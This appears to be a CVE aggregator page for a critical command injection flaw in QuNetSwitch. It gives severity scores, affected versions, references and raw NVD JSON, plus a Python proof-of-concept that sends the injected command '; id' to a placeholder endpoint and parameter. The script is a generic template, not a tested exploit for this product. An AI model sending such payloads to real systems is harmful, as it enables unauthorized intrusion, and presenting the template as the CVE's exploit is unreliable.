CVE-2026-22897

Description

A command injection vulnerability has been reported to affect QuNetSwitch. The remote attackers can then exploit the vulnerability to execute arbitrary commands. We have already fixed the vulnerability in the following version: QuNetSwitch 2.0.4.0415 and later

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:* - VULNERABLE

QuNetSwitch < 2.0.4.0415

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def verify_poc(target_url):
    """
    Proof of Concept for Command Injection in QuNetSwitch.
    This script attempts to execute the 'id' command.
    """
    # Replace with the actual vulnerable endpoint and parameter
    endpoint = "/api/vulnerable_endpoint" 
    payload = "; id" 
    full_url = f"{target_url}{endpoint}"
    
    try:
        # Sending malicious payload
        response = requests.get(full_url, params={"param": payload}, timeout=10)
        
        # Checking if command output exists in response
        if "uid=" in response.text or "gid=" in response.text:
            print(f"[+] Target {target_url} is vulnerable.")
            print(f"[+] Command execution output: {response.text}")
        else:
            print(f"[-] Target {target_url} does not appear to be vulnerable.")
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://192.168.1.100:8080" # Example Target
    verify_poc(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22897
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22897
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22897/
[4] VulDB https://vuldb.com/cve/CVE-2026-22897
[5] https://www.qnap.com/en/security-advisory/qsa-26-11

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22897", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:44.147", "lastModified": "2026-03-25T21:06:25.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A command injection vulnerability has been reported to affect QuNetSwitch. The remote attackers can then exploit the vulnerability to execute arbitrary commands.\n\nWe have already fixed the vulnerability in the following version:\nQuNetSwitch 2.0.4.0415 and later"}, {"lang": "es", "value": "Se ha informado de una vulnerabilidad de inyección de comandos que afecta a QuNetSwitch. Los atacantes remotos pueden entonces explotar la vulnerabilidad para ejecutar comandos arbitrarios.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQuNetSwitch 2.0.4.0415 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.1.13077", "versionEndExcluding": "2.0.4.0415", "matchCriteriaId": "111CE6FD-D6FE-4B5F-AC00-C1C7D7DB3704"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-11", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}